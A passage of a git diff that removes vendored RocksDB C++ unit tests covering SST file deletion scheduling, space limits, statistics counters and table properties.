-
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.db_paths.emplace_back(dbname_, 1024 * 100);
-  options.db_paths.emplace_back(dbname_ + "_2", 1024 * 100);
-  options.env = env_;
-
-  std::string trash_dir = test::TmpDir(env_) + "/trash";
-  int64_t rate_bytes_per_sec = 1024 * 1024;  // 1 Mb / Sec
-  Status s;
-  options.sst_file_manager.reset(NewSstFileManager(
-      env_, nullptr, trash_dir, rate_bytes_per_sec, false, &s));
-  ASSERT_OK(s);
-  auto sfm = static_cast<SstFileManagerImpl*>(options.sst_file_manager.get());
-  sfm->delete_scheduler()->TEST_SetMaxTrashDBRatio(1.1);
-
-  DestroyAndReopen(options);
-
-  // Create 4 files in L0
-  for (int i = 0; i < 4; i++) {
-    ASSERT_OK(Put("Key" + ToString(i), DummyString(1024, 'A')));
-    ASSERT_OK(Flush());
-  }
-  // We created 4 sst files in L0
-  ASSERT_EQ("4", FilesPerLevel(0));
-  // Compaction will delete files from L0 in first db path and generate a new
-  // file in L1 in second db path
-  CompactRangeOptions compact_options;
-  compact_options.target_path_id = 1;
-  Slice begin("Key0");
-  Slice end("Key3");
-  ASSERT_OK(db_->CompactRange(compact_options, &begin, &end));
-  ASSERT_EQ("0,1", FilesPerLevel(0));
-
-  // Create 4 files in L0
-  for (int i = 4; i < 8; i++) {
-    ASSERT_OK(Put("Key" + ToString(i), DummyString(1024, 'B')));
-    ASSERT_OK(Flush());
-  }
-  ASSERT_EQ("4,1", FilesPerLevel(0));
-
-  // Compaction will delete files from L0 in first db path and generate a new
-  // file in L1 in second db path
-  begin = "Key4";
-  end = "Key7";
-  ASSERT_OK(db_->CompactRange(compact_options, &begin, &end));
-  ASSERT_EQ("0,2", FilesPerLevel(0));
-
-  sfm->WaitForEmptyTrash();
-  ASSERT_EQ(bg_delete_file, 8);
-
-  compact_options.bottommost_level_compaction =
-      BottommostLevelCompaction::kForce;
-  ASSERT_OK(db_->CompactRange(compact_options, nullptr, nullptr));
-  ASSERT_EQ("0,1", FilesPerLevel(0));
-
-  sfm->WaitForEmptyTrash();
-  ASSERT_EQ(bg_delete_file, 8);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBSSTTest, DestroyDBWithRateLimitedDelete) {
-  int bg_delete_file = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::DeleteTrashFile:DeleteFile",
-      [&](void* arg) { bg_delete_file++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Status s;
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.env = env_;
-  std::string trash_dir = test::TmpDir(env_) + "/trash";
-  options.sst_file_manager.reset(
-      NewSstFileManager(env_, nullptr, trash_dir, 0, false, &s));
-  ASSERT_OK(s);
-  DestroyAndReopen(options);
-
-  // Create 4 files in L0
-  for (int i = 0; i < 4; i++) {
-    ASSERT_OK(Put("Key" + ToString(i), DummyString(1024, 'A')));
-    ASSERT_OK(Flush());
-  }
-  // We created 4 sst files in L0
-  ASSERT_EQ("4", FilesPerLevel(0));
-
-  // Close DB and destroy it using DeleteScheduler
-  Close();
-
-  auto sfm = static_cast<SstFileManagerImpl*>(options.sst_file_manager.get());
-
-  sfm->SetDeleteRateBytesPerSecond(1024 * 1024);
-  sfm->delete_scheduler()->TEST_SetMaxTrashDBRatio(1.1);
-  ASSERT_OK(DestroyDB(dbname_, options));
-  sfm->WaitForEmptyTrash();
-  // We have deleted the 4 sst files in the delete_scheduler
-  ASSERT_EQ(bg_delete_file, 4);
-}
-
-TEST_F(DBSSTTest, DBWithMaxSpaceAllowed) {
-  std::shared_ptr<SstFileManager> sst_file_manager(NewSstFileManager(env_));
-  auto sfm = static_cast<SstFileManagerImpl*>(sst_file_manager.get());
-
-  Options options = CurrentOptions();
-  options.sst_file_manager = sst_file_manager;
-  options.disable_auto_compactions = true;
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-
-  // Generate a file containing 100 keys.
-  for (int i = 0; i < 100; i++) {
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 50)));
-  }
-  ASSERT_OK(Flush());
-
-  uint64_t first_file_size = 0;
-  auto files_in_db = GetAllSSTFiles(&first_file_size);
-  ASSERT_EQ(sfm->GetTotalSize(), first_file_size);
-
-  // Set the maximum allowed space usage to the current total size
-  sfm->SetMaxAllowedSpaceUsage(first_file_size + 1);
-
-  ASSERT_OK(Put("key1", "val1"));
-  // This flush will cause bg_error_ and will fail
-  ASSERT_NOK(Flush());
-}
-
-TEST_F(DBSSTTest, DBWithMaxSpaceAllowedRandomized) {
-  // This test will set a maximum allowed space for the DB, then it will
-  // keep filling the DB until the limit is reached and bg_error_ is set.
-  // When bg_error_ is set we will verify that the DB size is greater
-  // than the limit.
-
-  std::vector<int> max_space_limits_mbs = {1, 2, 4, 8, 10};
-  decltype(max_space_limits_mbs)::value_type limit_mb_cb;
-  bool bg_error_set = false;
-  uint64_t total_sst_files_size = 0;
-
-  std::atomic<int> estimate_multiplier(1);
-  int reached_max_space_on_flush = 0;
-  int reached_max_space_on_compaction = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::FlushMemTableToOutputFile:MaxAllowedSpaceReached",
-      [&](void* arg) {
-        Status* bg_error = static_cast<Status*>(arg);
-        bg_error_set = true;
-        GetAllSSTFiles(&total_sst_files_size);
-        reached_max_space_on_flush++;
-        // low limit for size calculated using sst files
-        ASSERT_GE(total_sst_files_size, limit_mb_cb * 1024 * 1024);
-        // clear error to ensure compaction callback is called
-        *bg_error = Status::OK();
-        estimate_multiplier++;  // used in the main loop assert
-      });
-
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "CompactionJob::FinishCompactionOutputFile:MaxAllowedSpaceReached",
-      [&](void* arg) {
-        bg_error_set = true;
-        GetAllSSTFiles(&total_sst_files_size);
-        reached_max_space_on_compaction++;
-      });
-
-  for (auto limit_mb : max_space_limits_mbs) {
-    bg_error_set = false;
-    total_sst_files_size = 0;
-    estimate_multiplier = 1;
-    limit_mb_cb = limit_mb;
-    rocksdb::SyncPoint::GetInstance()->ClearTrace();
-    rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-    std::shared_ptr<SstFileManager> sst_file_manager(NewSstFileManager(env_));
-    auto sfm = static_cast<SstFileManagerImpl*>(sst_file_manager.get());
-
-    Options options = CurrentOptions();
-    options.sst_file_manager = sst_file_manager;
-    options.write_buffer_size = 1024 * 512;  // 512 Kb
-    DestroyAndReopen(options);
-    Random rnd(301);
-
-    sfm->SetMaxAllowedSpaceUsage(limit_mb * 1024 * 1024);
-
-    int keys_written = 0;
-    uint64_t estimated_db_size = 0;
-    while (true) {
-      auto s = Put(RandomString(&rnd, 10), RandomString(&rnd, 50));
-      if (!s.ok()) {
-        break;
-      }
-      keys_written++;
-      // Check the estimated db size vs the db limit just to make sure we
-      // dont run into an infinite loop
-      estimated_db_size = keys_written * 60;  // ~60 bytes per key
-      ASSERT_LT(estimated_db_size,
-                estimate_multiplier * limit_mb * 1024 * 1024 * 2);
-    }
-    ASSERT_TRUE(bg_error_set);
-    ASSERT_GE(total_sst_files_size, limit_mb * 1024 * 1024);
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  }
-
-  ASSERT_GT(reached_max_space_on_flush, 0);
-  ASSERT_GT(reached_max_space_on_compaction, 0);
-}
-
-TEST_F(DBSSTTest, OpenDBWithInfiniteMaxOpenFiles) {
-  // Open DB with infinite max open files
-  //  - First iteration use 1 thread to open files
-  //  - Second iteration use 5 threads to open files
-  for (int iter = 0; iter < 2; iter++) {
-    Options options;
-    options.create_if_missing = true;
-    options.write_buffer_size = 100000;
-    options.disable_auto_compactions = true;
-    options.max_open_files = -1;
-    if (iter == 0) {
-      options.max_file_opening_threads = 1;
-    } else {
-      options.max_file_opening_threads = 5;
-    }
-    options = CurrentOptions(options);
-    DestroyAndReopen(options);
-
-    // Create 12 Files in L0 (then move then to L2)
-    for (int i = 0; i < 12; i++) {
-      std::string k = "L2_" + Key(i);
-      ASSERT_OK(Put(k, k + std::string(1000, 'a')));
-      ASSERT_OK(Flush());
-    }
-    CompactRangeOptions compact_options;
-    compact_options.change_level = true;
-    compact_options.target_level = 2;
-    db_->CompactRange(compact_options, nullptr, nullptr);
-
-    // Create 12 Files in L0
-    for (int i = 0; i < 12; i++) {
-      std::string k = "L0_" + Key(i);
-      ASSERT_OK(Put(k, k + std::string(1000, 'a')));
-      ASSERT_OK(Flush());
-    }
-    Close();
-
-    // Reopening the DB will load all existing files
-    Reopen(options);
-    ASSERT_EQ("12,0,12", FilesPerLevel(0));
-    std::vector<std::vector<FileMetaData>> files;
-    dbfull()->TEST_GetFilesMetaData(db_->DefaultColumnFamily(), &files);
-
-    for (const auto& level : files) {
-      for (const auto& file : level) {
-        ASSERT_TRUE(file.table_reader_handle != nullptr);
-      }
-    }
-
-    for (int i = 0; i < 12; i++) {
-      ASSERT_EQ(Get("L0_" + Key(i)), "L0_" + Key(i) + std::string(1000, 'a'));
-      ASSERT_EQ(Get("L2_" + Key(i)), "L2_" + Key(i) + std::string(1000, 'a'));
-    }
-  }
-}
-
-TEST_F(DBSSTTest, GetTotalSstFilesSize) {
-  // We don't propagate oldest-key-time table property on compaction and
-  // just write 0 as default value. This affect the exact table size, since
-  // we encode table properties as varint64. Force time to be 0 to work around
-  // it. Should remove the workaround after we propagate the property on
-  // compaction.
-  std::unique_ptr<MockTimeEnv> mock_env(new MockTimeEnv(Env::Default()));
-  mock_env->set_current_time(0);
-
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.compression = kNoCompression;
-  options.env = mock_env.get();
-  DestroyAndReopen(options);
-  // Generate 5 files in L0
-  for (int i = 0; i < 5; i++) {
-    for (int j = 0; j < 10; j++) {
-      std::string val = "val_file_" + ToString(i);
-      ASSERT_OK(Put(Key(j), val));
-    }
-    Flush();
-  }
-  ASSERT_EQ("5", FilesPerLevel(0));
-
-  std::vector<LiveFileMetaData> live_files_meta;
-  dbfull()->GetLiveFilesMetaData(&live_files_meta);
-  ASSERT_EQ(live_files_meta.size(), 5);
-  uint64_t single_file_size = live_files_meta[0].size;
-
-  uint64_t live_sst_files_size = 0;
-  uint64_t total_sst_files_size = 0;
-  for (const auto& file_meta : live_files_meta) {
-    live_sst_files_size += file_meta.size;
-  }
-
-  ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size",
-                                       &total_sst_files_size));
-  // Live SST files = 5
-  // Total SST files = 5
-  ASSERT_EQ(live_sst_files_size, 5 * single_file_size);
-  ASSERT_EQ(total_sst_files_size, 5 * single_file_size);
-
-  // hold current version
-  std::unique_ptr<Iterator> iter1(dbfull()->NewIterator(ReadOptions()));
-
-  // Compact 5 files into 1 file in L0
-  ASSERT_OK(dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  ASSERT_EQ("0,1", FilesPerLevel(0));
-
-  live_files_meta.clear();
-  dbfull()->GetLiveFilesMetaData(&live_files_meta);
-  ASSERT_EQ(live_files_meta.size(), 1);
-
-  live_sst_files_size = 0;
-  total_sst_files_size = 0;
-  for (const auto& file_meta : live_files_meta) {
-    live_sst_files_size += file_meta.size;
-  }
-  ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size",
-                                       &total_sst_files_size));
-  // Live SST files = 1 (compacted file)
-  // Total SST files = 6 (5 original files + compacted file)
-  ASSERT_EQ(live_sst_files_size, 1 * single_file_size);
-  ASSERT_EQ(total_sst_files_size, 6 * single_file_size);
-
-  // hold current version
-  std::unique_ptr<Iterator> iter2(dbfull()->NewIterator(ReadOptions()));
-
-  // Delete all keys and compact, this will delete all live files
-  for (int i = 0; i < 10; i++) {
-    ASSERT_OK(Delete(Key(i)));
-  }
-  Flush();
-  ASSERT_OK(dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  ASSERT_EQ("", FilesPerLevel(0));
-
-  live_files_meta.clear();
-  dbfull()->GetLiveFilesMetaData(&live_files_meta);
-  ASSERT_EQ(live_files_meta.size(), 0);
-
-  ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size",
-                                       &total_sst_files_size));
-  // Live SST files = 0
-  // Total SST files = 6 (5 original files + compacted file)
-  ASSERT_EQ(total_sst_files_size, 6 * single_file_size);
-
-  iter1.reset();
-  ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size",
-                                       &total_sst_files_size));
-  // Live SST files = 0
-  // Total SST files = 1 (compacted file)
-  ASSERT_EQ(total_sst_files_size, 1 * single_file_size);
-
-  iter2.reset();
-  ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size",
-                                       &total_sst_files_size));
-  // Live SST files = 0
-  // Total SST files = 0
-  ASSERT_EQ(total_sst_files_size, 0);
-
-  // Close db before mock_env destruct.
-  Close();
-}
-
-TEST_F(DBSSTTest, GetTotalSstFilesSizeVersionsFilesShared) {
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.compression = kNoCompression;
-  DestroyAndReopen(options);
-  // Generate 5 files in L0
-  for (int i = 0; i < 5; i++) {
-    ASSERT_OK(Put(Key(i), "val"));
-    Flush();
-  }
-  ASSERT_EQ("5", FilesPerLevel(0));
-
-  std::vector<LiveFileMetaData> live_files_meta;
-  dbfull()->GetLiveFilesMetaData(&live_files_meta);
-  ASSERT_EQ(live_files_meta.size(), 5);
-  uint64_t single_file_size = live_files_meta[0].size;
-
-  uint64_t live_sst_files_size = 0;
-  uint64_t total_sst_files_size = 0;
-  for (const auto& file_meta : live_files_meta) {
-    live_sst_files_size += file_meta.size;
-  }
-
-  ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size",
-                                       &total_sst_files_size));
-
-  // Live SST files = 5
-  // Total SST files = 5
-  ASSERT_EQ(live_sst_files_size, 5 * single_file_size);
-  ASSERT_EQ(total_sst_files_size, 5 * single_file_size);
-
-  // hold current version
-  std::unique_ptr<Iterator> iter1(dbfull()->NewIterator(ReadOptions()));
-
-  // Compaction will do trivial move from L0 to L1
-  ASSERT_OK(dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  ASSERT_EQ("0,5", FilesPerLevel(0));
-
-  live_files_meta.clear();
-  dbfull()->GetLiveFilesMetaData(&live_files_meta);
-  ASSERT_EQ(live_files_meta.size(), 5);
-
-  live_sst_files_size = 0;
-  total_sst_files_size = 0;
-  for (const auto& file_meta : live_files_meta) {
-    live_sst_files_size += file_meta.size;
-  }
-  ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size",
-                                       &total_sst_files_size));
-  // Live SST files = 5
-  // Total SST files = 5 (used in 2 version)
-  ASSERT_EQ(live_sst_files_size, 5 * single_file_size);
-  ASSERT_EQ(total_sst_files_size, 5 * single_file_size);
-
-  // hold current version
-  std::unique_ptr<Iterator> iter2(dbfull()->NewIterator(ReadOptions()));
-
-  // Delete all keys and compact, this will delete all live files
-  for (int i = 0; i < 5; i++) {
-    ASSERT_OK(Delete(Key(i)));
-  }
-  Flush();
-  ASSERT_OK(dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  ASSERT_EQ("", FilesPerLevel(0));
-
-  live_files_meta.clear();
-  dbfull()->GetLiveFilesMetaData(&live_files_meta);
-  ASSERT_EQ(live_files_meta.size(), 0);
-
-  ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size",
-                                       &total_sst_files_size));
-  // Live SST files = 0
-  // Total SST files = 5 (used in 2 version)
-  ASSERT_EQ(total_sst_files_size, 5 * single_file_size);
-
-  iter1.reset();
-  iter2.reset();
-
-  ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size",
-                                       &total_sst_files_size));
-  // Live SST files = 0
-  // Total SST files = 0
-  ASSERT_EQ(total_sst_files_size, 0);
-}
-
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_statistics_test.cc b/thirdparty/rocksdb/db/db_statistics_test.cc
deleted file mode 100644
index 237a2c6..0000000
--- a/thirdparty/rocksdb/db/db_statistics_test.cc
+++ /dev/null
@@ -1,149 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <string>
-
-#include "db/db_test_util.h"
-#include "monitoring/thread_status_util.h"
-#include "port/stack_trace.h"
-#include "rocksdb/statistics.h"
-
-namespace rocksdb {
-
-class DBStatisticsTest : public DBTestBase {
- public:
-  DBStatisticsTest() : DBTestBase("/db_statistics_test") {}
-};
-
-TEST_F(DBStatisticsTest, CompressionStatsTest) {
-  CompressionType type;
-
-  if (Snappy_Supported()) {
-    type = kSnappyCompression;
-    fprintf(stderr, "using snappy\n");
-  } else if (Zlib_Supported()) {
-    type = kZlibCompression;
-    fprintf(stderr, "using zlib\n");
-  } else if (BZip2_Supported()) {
-    type = kBZip2Compression;
-    fprintf(stderr, "using bzip2\n");
-  } else if (LZ4_Supported()) {
-    type = kLZ4Compression;
-    fprintf(stderr, "using lz4\n");
-  } else if (XPRESS_Supported()) {
-    type = kXpressCompression;
-    fprintf(stderr, "using xpress\n");
-  } else if (ZSTD_Supported()) {
-    type = kZSTD;
-    fprintf(stderr, "using ZSTD\n");
-  } else {
-    fprintf(stderr, "skipping test, compression disabled\n");
-    return;
-  }
-
-  Options options = CurrentOptions();
-  options.compression = type;
-  options.statistics = rocksdb::CreateDBStatistics();
-  options.statistics->stats_level_ = StatsLevel::kExceptTimeForMutex;
-  DestroyAndReopen(options);
-
-  int kNumKeysWritten = 100000;
-
-  // Check that compressions occur and are counted when compression is turned on
-  Random rnd(301);
-  for (int i = 0; i < kNumKeysWritten; ++i) {
-    // compressible string
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 128) + std::string(128, 'a')));
-  }
-  ASSERT_OK(Flush());
-  ASSERT_GT(options.statistics->getTickerCount(NUMBER_BLOCK_COMPRESSED), 0);
-
-  for (int i = 0; i < kNumKeysWritten; ++i) {
-    auto r = Get(Key(i));
-  }
-  ASSERT_GT(options.statistics->getTickerCount(NUMBER_BLOCK_DECOMPRESSED), 0);
-
-  options.compression = kNoCompression;
-  DestroyAndReopen(options);
-  uint64_t currentCompressions =
-            options.statistics->getTickerCount(NUMBER_BLOCK_COMPRESSED);
-  uint64_t currentDecompressions =
-            options.statistics->getTickerCount(NUMBER_BLOCK_DECOMPRESSED);
-
-  // Check that compressions do not occur when turned off
-  for (int i = 0; i < kNumKeysWritten; ++i) {
-    // compressible string
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 128) + std::string(128, 'a')));
-  }
-  ASSERT_OK(Flush());
-  ASSERT_EQ(options.statistics->getTickerCount(NUMBER_BLOCK_COMPRESSED)
-            - currentCompressions, 0);
-
-  for (int i = 0; i < kNumKeysWritten; ++i) {
-    auto r = Get(Key(i));
-  }
-  ASSERT_EQ(options.statistics->getTickerCount(NUMBER_BLOCK_DECOMPRESSED)
-            - currentDecompressions, 0);
-}
-
-TEST_F(DBStatisticsTest, MutexWaitStatsDisabledByDefault) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.statistics = rocksdb::CreateDBStatistics();
-  CreateAndReopenWithCF({"pikachu"}, options);
-  const uint64_t kMutexWaitDelay = 100;
-  ThreadStatusUtil::TEST_SetStateDelay(ThreadStatus::STATE_MUTEX_WAIT,
-                                       kMutexWaitDelay);
-  ASSERT_OK(Put("hello", "rocksdb"));
-  ASSERT_EQ(TestGetTickerCount(options, DB_MUTEX_WAIT_MICROS), 0);
-  ThreadStatusUtil::TEST_SetStateDelay(ThreadStatus::STATE_MUTEX_WAIT, 0);
-}
-
-TEST_F(DBStatisticsTest, MutexWaitStats) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.statistics = rocksdb::CreateDBStatistics();
-  options.statistics->stats_level_ = StatsLevel::kAll;
-  CreateAndReopenWithCF({"pikachu"}, options);
-  const uint64_t kMutexWaitDelay = 100;
-  ThreadStatusUtil::TEST_SetStateDelay(ThreadStatus::STATE_MUTEX_WAIT,
-                                       kMutexWaitDelay);
-  ASSERT_OK(Put("hello", "rocksdb"));
-  ASSERT_GE(TestGetTickerCount(options, DB_MUTEX_WAIT_MICROS), kMutexWaitDelay);
-  ThreadStatusUtil::TEST_SetStateDelay(ThreadStatus::STATE_MUTEX_WAIT, 0);
-}
-
-TEST_F(DBStatisticsTest, ResetStats) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.statistics = rocksdb::CreateDBStatistics();
-  DestroyAndReopen(options);
-  for (int i = 0; i < 2; ++i) {
-    // pick arbitrary ticker and histogram. On first iteration they're zero
-    // because db is unused. On second iteration they're zero due to Reset().
-    ASSERT_EQ(0, TestGetTickerCount(options, NUMBER_KEYS_WRITTEN));
-    HistogramData histogram_data;
-    options.statistics->histogramData(DB_WRITE, &histogram_data);
-    ASSERT_EQ(0.0, histogram_data.max);
-
-    if (i == 0) {
-      // The Put() makes some of the ticker/histogram stats nonzero until we
-      // Reset().
-      ASSERT_OK(Put("hello", "rocksdb"));
-      ASSERT_EQ(1, TestGetTickerCount(options, NUMBER_KEYS_WRITTEN));
-      options.statistics->histogramData(DB_WRITE, &histogram_data);
-      ASSERT_GT(histogram_data.max, 0.0);
-      options.statistics->Reset();
-    }
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_table_properties_test.cc b/thirdparty/rocksdb/db/db_table_properties_test.cc
deleted file mode 100644
index 265e9cb..0000000
--- a/thirdparty/rocksdb/db/db_table_properties_test.cc
+++ /dev/null
@@ -1,261 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <unordered_set>
-#include <vector>
-
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-#include "rocksdb/db.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-#ifndef ROCKSDB_LITE
-
-namespace rocksdb {
-
-// A helper function that ensures the table properties returned in
-// `GetPropertiesOfAllTablesTest` is correct.
-// This test assumes entries size is different for each of the tables.
-namespace {
-
-void VerifyTableProperties(DB* db, uint64_t expected_entries_size) {
-  TablePropertiesCollection props;
-  ASSERT_OK(db->GetPropertiesOfAllTables(&props));
-
-  ASSERT_EQ(4U, props.size());
-  std::unordered_set<uint64_t> unique_entries;
-
-  // Indirect test
-  uint64_t sum = 0;
-  for (const auto& item : props) {
-    unique_entries.insert(item.second->num_entries);
-    sum += item.second->num_entries;
-  }
-
-  ASSERT_EQ(props.size(), unique_entries.size());
-  ASSERT_EQ(expected_entries_size, sum);
-}
-}  // namespace
-
-class DBTablePropertiesTest : public DBTestBase {
- public:
-  DBTablePropertiesTest() : DBTestBase("/db_table_properties_test") {}
-  TablePropertiesCollection TestGetPropertiesOfTablesInRange(
-      std::vector<Range> ranges, std::size_t* num_properties = nullptr,
-      std::size_t* num_files = nullptr);
-};
-
-TEST_F(DBTablePropertiesTest, GetPropertiesOfAllTablesTest) {
-  Options options = CurrentOptions();
-  options.level0_file_num_compaction_trigger = 8;
-  Reopen(options);
-  // Create 4 tables
-  for (int table = 0; table < 4; ++table) {
-    for (int i = 0; i < 10 + table; ++i) {
-      db_->Put(WriteOptions(), ToString(table * 100 + i), "val");
-    }
-    db_->Flush(FlushOptions());
-  }
-
-  // 1. Read table properties directly from file
-  Reopen(options);
-  VerifyTableProperties(db_, 10 + 11 + 12 + 13);
-
-  // 2. Put two tables to table cache and
-  Reopen(options);
-  // fetch key from 1st and 2nd table, which will internally place that table to
-  // the table cache.
-  for (int i = 0; i < 2; ++i) {
-    Get(ToString(i * 100 + 0));
-  }
-
-  VerifyTableProperties(db_, 10 + 11 + 12 + 13);
-
-  // 3. Put all tables to table cache
-  Reopen(options);
-  // fetch key from 1st and 2nd table, which will internally place that table to
-  // the table cache.
-  for (int i = 0; i < 4; ++i) {
-    Get(ToString(i * 100 + 0));
-  }
-  VerifyTableProperties(db_, 10 + 11 + 12 + 13);
-}
-
-TablePropertiesCollection
-DBTablePropertiesTest::TestGetPropertiesOfTablesInRange(
-    std::vector<Range> ranges, std::size_t* num_properties,
-    std::size_t* num_files) {
-
-  // Since we deref zero element in the vector it can not be empty
-  // otherwise we pass an address to some random memory
-  EXPECT_GT(ranges.size(), 0U);
-  // run the query
-  TablePropertiesCollection props;
-  EXPECT_OK(db_->GetPropertiesOfTablesInRange(
-      db_->DefaultColumnFamily(), &ranges[0], ranges.size(), &props));
-
-  // Make sure that we've received properties for those and for those files
-  // only which fall within requested ranges
-  std::vector<LiveFileMetaData> vmd;
-  db_->GetLiveFilesMetaData(&vmd);
-  for (auto& md : vmd) {
-    std::string fn = md.db_path + md.name;
-    bool in_range = false;
-    for (auto& r : ranges) {
-      // smallestkey < limit && largestkey >= start
-      if (r.limit.compare(md.smallestkey) >= 0 &&
-          r.start.compare(md.largestkey) <= 0) {
-        in_range = true;
-        EXPECT_GT(props.count(fn), 0);
-      }
-    }
-    if (!in_range) {
-      EXPECT_EQ(props.count(fn), 0);
-    }
-  }
-
-  if (num_properties) {
-    *num_properties = props.size();
-  }
-
-  if (num_files) {
-    *num_files = vmd.size();
-  }
-  return props;
-}
-
-TEST_F(DBTablePropertiesTest, GetPropertiesOfTablesInRange) {
-  // Fixed random sead
-  Random rnd(301);
-
-  Options options;
-  options.create_if_missing = true;
-  options.write_buffer_size = 4096;
-  options.max_write_buffer_number = 3;
-  options.level0_file_num_compaction_trigger = 2;
-  options.level0_slowdown_writes_trigger = 2;
-  options.level0_stop_writes_trigger = 4;
-  options.target_file_size_base = 2048;
-  options.max_bytes_for_level_base = 10240;
-  options.max_bytes_for_level_multiplier = 4;
-  options.hard_pending_compaction_bytes_limit = 16 * 1024;
-  options.num_levels = 8;
-  options.env = env_;
-
-  DestroyAndReopen(options);
-
-  // build a decent LSM
-  for (int i = 0; i < 10000; i++) {
-    ASSERT_OK(Put(test::RandomKey(&rnd, 5), RandomString(&rnd, 102)));
-  }
-  Flush();
-  dbfull()->TEST_WaitForCompact();
-  if (NumTableFilesAtLevel(0) == 0) {
-    ASSERT_OK(Put(test::RandomKey(&rnd, 5), RandomString(&rnd, 102)));
-    Flush();
-  }
-
-  db_->PauseBackgroundWork();
-
-  // Ensure that we have at least L0, L1 and L2
-  ASSERT_GT(NumTableFilesAtLevel(0), 0);
-  ASSERT_GT(NumTableFilesAtLevel(1), 0);
-  ASSERT_GT(NumTableFilesAtLevel(2), 0);
-
-  // Query the largest range
-  std::size_t num_properties, num_files;
-  TestGetPropertiesOfTablesInRange(
-      {Range(test::RandomKey(&rnd, 5, test::RandomKeyType::SMALLEST),
-             test::RandomKey(&rnd, 5, test::RandomKeyType::LARGEST))},
-      &num_properties, &num_files);
-  ASSERT_EQ(num_properties, num_files);
-
-  // Query the empty range
-  TestGetPropertiesOfTablesInRange(
-      {Range(test::RandomKey(&rnd, 5, test::RandomKeyType::LARGEST),
-             test::RandomKey(&rnd, 5, test::RandomKeyType::SMALLEST))},
-      &num_properties, &num_files);
-  ASSERT_GT(num_files, 0);
-  ASSERT_EQ(num_properties, 0);
-
-  // Query the middle rangee
-  TestGetPropertiesOfTablesInRange(
-      {Range(test::RandomKey(&rnd, 5, test::RandomKeyType::MIDDLE),
-             test::RandomKey(&rnd, 5, test::RandomKeyType::LARGEST))},
-      &num_properties, &num_files);
-  ASSERT_GT(num_files, 0);
-  ASSERT_GT(num_files, num_properties);
-  ASSERT_GT(num_properties, 0);
-
-  // Query a bunch of random ranges
-  for (int j = 0; j < 100; j++) {
-    // create a bunch of ranges
-    std::vector<std::string> random_keys;
-    // Random returns numbers with zero included
-    // when we pass empty ranges TestGetPropertiesOfTablesInRange()
-    // derefs random memory in the empty ranges[0]
-    // so want to be greater than zero and even since
-    // the below loop requires that random_keys.size() to be even.
-    auto n = 2 * (rnd.Uniform(50) + 1);
-
-    for (uint32_t i = 0; i < n; ++i) {
-      random_keys.push_back(test::RandomKey(&rnd, 5));
-    }
-
-    ASSERT_GT(random_keys.size(), 0U);
-    ASSERT_EQ((random_keys.size() % 2), 0U);
-
-    std::vector<Range> ranges;
-    auto it = random_keys.begin();
-    while (it != random_keys.end()) {
-      ranges.push_back(Range(*it, *(it + 1)));
-      it += 2;
-    }
-
-    TestGetPropertiesOfTablesInRange(std::move(ranges));
-  }
-}
-
-TEST_F(DBTablePropertiesTest, GetColumnFamilyNameProperty) {
-  std::string kExtraCfName = "pikachu";
-  CreateAndReopenWithCF({kExtraCfName}, CurrentOptions());
-
-  // Create one table per CF, then verify it was created with the column family
-  // name property.
-  for (int cf = 0; cf < 2; ++cf) {
-    Put(cf, "key", "val");
-    Flush(cf);
-
-    TablePropertiesCollection fname_to_props;
-    ASSERT_OK(db_->GetPropertiesOfAllTables(handles_[cf], &fname_to_props));
